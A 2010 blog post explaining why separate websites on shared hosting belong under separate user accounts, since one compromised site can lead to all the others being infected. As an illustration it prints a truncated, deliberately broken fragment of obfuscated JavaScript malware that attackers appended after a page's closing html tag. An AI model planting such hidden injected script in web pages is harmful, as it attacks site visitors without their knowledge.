Separate Websites should be run under separate User Accounts

Written by James McDonald

August 16, 2010

If you have an account with a webhost which allows you to run multiple domains (or even `unlimited’ domains ala Dreamhost). You may be tempted to run multiple websites under the default account that is provided by the hosting company.

But while convenient, this has a pretty major security pitfall.

For example with my webhost If you run the default single user account on the webserver the layout for multiple domains on the server is something like this.

/home/username/www.yourdomain1.com
              /www.yourdomain2.com

The files in each website are owned and writeable by the one user and each site is served to the public using the same Apache process.

Therefore if a remote attacker uses an automated attack and compromises one website the exploit can loop up to the highest point they have write access to (the /home/username directory) and then down through the directory tree finding and appending malicious scripts or malware to each web servable page such as index.php, index.html etc.

A better setup is to create a new user account for each website that you create. And while it’s a pain to remember and safely store all the different passwords it reduces your risk of losing multiple sites to remote automated exploits. So the layout for multiple accounts on the webserver looks something like

/home/username1/www.yourdomain1.com
/home/username2/www.yourdomain2.com

Here is an example of what can get appended to your index files. In this case the index.php page generated it’s normal html output but after the closing </html> tag the attacker has placed a nasty little cross site scripting javascript it’s obsfuscated so you can’t read the code because the attacker want’s to hide the workings of the java script.

This particular exploit tried to contact twitter to get it’s commands from the 3v1l h@x0r controller. (I’ve added some random spaces hoping that I don’t get listed as hosting Malware from this code sample)

// attack code appended after last  tag
var $a="Z63cZ3dZ225nZ2567Z2574h;iZ252b+)Z25 7bZ2574mpZ253dZ2564sZ252eslZ2569ce(Z2569,Z2569Z252b1)Z253bZ22;cdZ3dZ22st Z253dstZ252bSZ2574riZ256
.... [ many more lines of obsfucated javascript code here. And then follows the functions used to decode the obfuscated javascript and execute it ] ...
28v)Z2bZ27;expirZ65sZ3dZ27+exd.toGZ4dTSZ74Z72ingZ28);Z7d;";

var ez=window;
ez[S tring.from Char Code(101,118,97)+"l"](f ds()); 
fun ction a s d(s){
           r="";
               for(i=0;i

Needless to say if you put all your eggs (websites) in one basket one metaphorical boot (cracker) can break them all.

Note: As well as separating your websites to different user accounts. Remember to _regularly_ update your CMS software (e.g. WordPress, Joomla etc).

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *

You May Also Like…

How to Research a CPU Upgrade

How to Research a CPU Upgrade

Upgrade Time! Doing a lot of VMWare Workstation virtualization to create labs for self-study and training. Finding...